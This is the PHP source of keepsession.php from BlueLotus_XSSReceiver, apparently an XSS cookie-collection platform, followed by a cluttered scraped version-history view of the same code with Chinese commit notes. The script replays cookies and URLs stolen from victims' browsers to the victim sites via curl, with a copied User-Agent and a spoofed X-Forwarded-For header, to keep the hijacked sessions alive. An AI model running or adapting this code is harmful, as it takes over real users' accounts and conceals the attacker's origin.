BlueLotus_XSSReceiver/keepsession.php

<?php
define("IN_XSS_PLATFORM",true);

ignore_user_abort();
//Windows平台最好别设成0，因为windows上lock没法实现非阻塞
set_time_limit(0);

require_once("config.php");
require_once("functions.php");
require_once("dio.php");

if(KEEP_SESSION)
{
	//利用非阻塞的flock实现单例运行
	$pid = fopen(DATA_PATH. '/check.pid', "w");
	if(!$pid)
		exit();
	
	if(flock($pid, LOCK_EX|LOCK_NB))
	{
		$files = glob(DATA_PATH . '/*.php');
		foreach ($files as $file) {
			$filename=basename($file,".php");
			$info=loadInfo($filename);
			if($info['keepsession']===true)
			{
				$url=getLocation($info);
				$cookie=getCookie($info);
				
				$useragent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2535.0 Safari/537.36";
				if(isset($info['headers_data']['User-Agent']))
					$useragent=$info['headers_data']['User-Agent'];

				$ip=$info['user_IP'];
				if($url!="" && $cookie!="")
				{
					$ch = curl_init(); 
					$header[]= 'User-Agent: '.$useragent;
					$header[]= 'Cookie: '.$cookie;
					$header[]= 'X-Forwarded-For: '.$ip;
					
					curl_setopt($ch,CURLOPT_URL,$url);
					curl_setopt($ch,CURLOPT_HTTPHEADER,$header);
					curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
					curl_setopt($ch, CURLOPT_TIMEOUT,10);  
					//https不校验证书，按需开启吧
					//curl_setopt ( $curl_handle, CURLOPT_SSL_VERIFYHOST, 0 );
					
					curl_exec($ch);
					curl_close($ch);
				}	
			}
				
		} 	
		
		//可加上sleep来防止keepsession被ddos	
		//sleep(10);
		flock($pid, LOCK_UN);
	}	
	
	fclose($pid);

}

function getCookie($info){
	$cookie="";
	
	if(isset($info['decoded_get_data']['cookie'])&&$info['decoded_get_data']['cookie']!="")
		$cookie=$info['decoded_get_data']['cookie'];
	else if(isset($info['get_data']['cookie'])&&$info['get_data']['cookie']!="")
		$cookie=$info['get_data']['cookie'];
	else if(isset($info['decoded_post_data']['cookie'])&&$info['decoded_post_data']['cookie']!="")
		$cookie=$info['decoded_post_data']['cookie'];
	else if(isset($info['post_data']['cookie'])&&$info['post_data']['cookie']!="")
		$cookie=$info['post_data']['cookie'];
	else if(isset($info['decoded_cookie_data']['cookie'])&&$info['decoded_cookie_data']['cookie']!="")
		$cookie=$info['decoded_cookie_data']['cookie'];
	else if(isset($info['cookie_data']['cookie'])&&$info['cookie_data']['cookie']!="")
		$cookie=$info['cookie_data']['cookie'];
	
	return htmlspecialchars_decode(stripslashes($cookie),ENT_QUOTES);

}

function getLocation($info){
	$location="";
	
	if(isset($info['decoded_get_data']['location'])&&$info['decoded_get_data']['location']!="")
		$location=$info['decoded_get_data']['location'];
	else if(isset($info['get_data']['location'])&&$info['get_data']['location']!="")
		$location=$info['get_data']['location'];
	else if(isset($info['decoded_post_data']['location'])&&$info['decoded_post_data']['location']!="")
		$location=$info['decoded_post_data']['location'];
	else if(isset($info['post_data']['location'])&&$info['post_data']['location']!="")
		$location=$info['post_data']['location'];
	else if(isset($info['decoded_cookie_data']['location'])&&$info['decoded_cookie_data']['location']!="")
		$location=$info['decoded_cookie_data']['location'];
	else if(isset($info['cookie_data']['location'])&&$info['cookie_data']['location']!="")
		$location=$info['cookie_data']['location'];
	else if(isset($info['headers_data']['Referer'])&&$info['headers_data']['Referer']!="")
		$location=$info['headers_data']['Referer'];

	return htmlspecialchars_decode(stripslashes($location),ENT_QUOTES);
}

?>
-												Version 2.0
实现基本功能
实现了基本界面admin.php
支持查看各种信息，支持自动base64解码

todolist
keepsession
认证
完全启用CSP
我的js
js模板

为实现一些jqxgrid无法实现的功能改动了jqx库，详见diff文件夹

											
										
										
											2015-10-27 12:26:59 +08:00
+								<?php
 								define("IN_XSS_PLATFORM",true);
-												Version 2.3
实现keepsession
修复新消息时标题的bug

											
										
										
											2015-10-31 13:46:47 +08:00
+								ignore_user_abort();
 								//Windows平台最好别设成0，因为windows上lock没法实现非阻塞
 								set_time_limit(0);
-												Version 2.0
实现基本功能
实现了基本界面admin.php
支持查看各种信息，支持自动base64解码

todolist
keepsession
认证
完全启用CSP
我的js
js模板

为实现一些jqxgrid无法实现的功能改动了jqx库，详见diff文件夹

											
										
										
											2015-10-27 12:26:59 +08:00
+								require_once("config.php");
 								require_once("functions.php");
 								require_once("dio.php");
-												Version 2.3
实现keepsession
修复新消息时标题的bug

											
										
										
											2015-10-31 13:46:47 +08:00
 								if(KEEP_SESSION)
 								{
 									//利用非阻塞的flock实现单例运行
 									$pid = fopen(DATA_PATH. '/check.pid', "w");
 									if(!$pid)
 										exit();
 									if(flock($pid, LOCK_EX|LOCK_NB))
 									{
 										$files = glob(DATA_PATH . '/*.php');
 										foreach ($files as $file) {
 											$filename=basename($file,".php");
 											$info=loadInfo($filename);
 											if($info['keepsession']===true)
 											{
 												$url=getLocation($info);
 												$cookie=getCookie($info);
 												$useragent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2535.0 Safari/537.36";
 												if(isset($info['headers_data']['User-Agent']))
 													$useragent=$info['headers_data']['User-Agent'];
-												Version 2.3.1
keepsession时伪造ip访问

											
										
										
											2015-10-31 14:32:22 +08:00
+												$ip=$info['user_IP'];
-												Version 2.3
实现keepsession
修复新消息时标题的bug

											
										
										
											2015-10-31 13:46:47 +08:00
+												if($url!="" && $cookie!="")
 												{
 													$ch = curl_init();
 													$header[]= 'User-Agent: '.$useragent;
 													$header[]= 'Cookie: '.$cookie;
-												Version 2.3.1
keepsession时伪造ip访问

											
										
										
											2015-10-31 14:32:22 +08:00
+													$header[]= 'X-Forwarded-For: '.$ip;
-												Version 2.3
实现keepsession
修复新消息时标题的bug

											
										
										
											2015-10-31 13:46:47 +08:00
+													curl_setopt($ch,CURLOPT_URL,$url);
 													curl_setopt($ch,CURLOPT_HTTPHEADER,$header);
 													curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
 													curl_setopt($ch, CURLOPT_TIMEOUT,10);
 													//https不校验证书，按需开启吧
 													//curl_setopt ( $curl_handle, CURLOPT_SSL_VERIFYHOST, 0 );
-												Version 2.3.1
keepsession时伪造ip访问

											
										
										
											2015-10-31 14:32:22 +08:00
-												Version 2.3
实现keepsession
修复新消息时标题的bug

											
										
										
											2015-10-31 13:46:47 +08:00
+													curl_exec($ch);
 													curl_close($ch);
 												}
 											}
 										}
 										//可加上sleep来防止keepsession被ddos
 										//sleep(10);
 										flock($pid, LOCK_UN);
 									}
 									fclose($pid);
 								}
 								function getCookie($info){
 									$cookie="";
-												Version 2.0
实现基本功能
实现了基本界面admin.php
支持查看各种信息，支持自动base64解码

todolist
keepsession
认证
完全启用CSP
我的js
js模板

为实现一些jqxgrid无法实现的功能改动了jqx库，详见diff文件夹

											
										
										
											2015-10-27 12:26:59 +08:00
-												Version 2.3
实现keepsession
修复新消息时标题的bug

											
										
										
											2015-10-31 13:46:47 +08:00
+									if(isset($info['decoded_get_data']['cookie'])&&$info['decoded_get_data']['cookie']!="")
 										$cookie=$info['decoded_get_data']['cookie'];
 									else if(isset($info['get_data']['cookie'])&&$info['get_data']['cookie']!="")
 										$cookie=$info['get_data']['cookie'];
 									else if(isset($info['decoded_post_data']['cookie'])&&$info['decoded_post_data']['cookie']!="")
 										$cookie=$info['decoded_post_data']['cookie'];
 									else if(isset($info['post_data']['cookie'])&&$info['post_data']['cookie']!="")
 										$cookie=$info['post_data']['cookie'];
 									else if(isset($info['decoded_cookie_data']['cookie'])&&$info['decoded_cookie_data']['cookie']!="")
 										$cookie=$info['decoded_cookie_data']['cookie'];
 									else if(isset($info['cookie_data']['cookie'])&&$info['cookie_data']['cookie']!="")
 										$cookie=$info['cookie_data']['cookie'];
 									return htmlspecialchars_decode(stripslashes($cookie),ENT_QUOTES);
 								}
 								function getLocation($info){
 									$location="";
 									if(isset($info['decoded_get_data']['location'])&&$info['decoded_get_data']['location']!="")
 										$location=$info['decoded_get_data']['location'];
 									else if(isset($info['get_data']['location'])&&$info['get_data']['location']!="")
 										$location=$info['get_data']['location'];
 									else if(isset($info['decoded_post_data']['location'])&&$info['decoded_post_data']['location']!="")
 										$location=$info['decoded_post_data']['location'];
 									else if(isset($info['post_data']['location'])&&$info['post_data']['location']!="")
 										$location=$info['post_data']['location'];
 									else if(isset($info['decoded_cookie_data']['location'])&&$info['decoded_cookie_data']['location']!="")
 										$location=$info['decoded_cookie_data']['location'];
 									else if(isset($info['cookie_data']['location'])&&$info['cookie_data']['location']!="")
 										$location=$info['cookie_data']['location'];
 									else if(isset($info['headers_data']['Referer'])&&$info['headers_data']['Referer']!="")
 										$location=$info['headers_data']['Referer'];
 									return htmlspecialchars_decode(stripslashes($location),ENT_QUOTES);
 								}
-												Version 2.0
实现基本功能
实现了基本界面admin.php
支持查看各种信息，支持自动base64解码

todolist
keepsession
认证
完全启用CSP
我的js
js模板

为实现一些jqxgrid无法实现的功能改动了jqx库，详见diff文件夹

											
										
										
											2015-10-27 12:26:59 +08:00
+								?>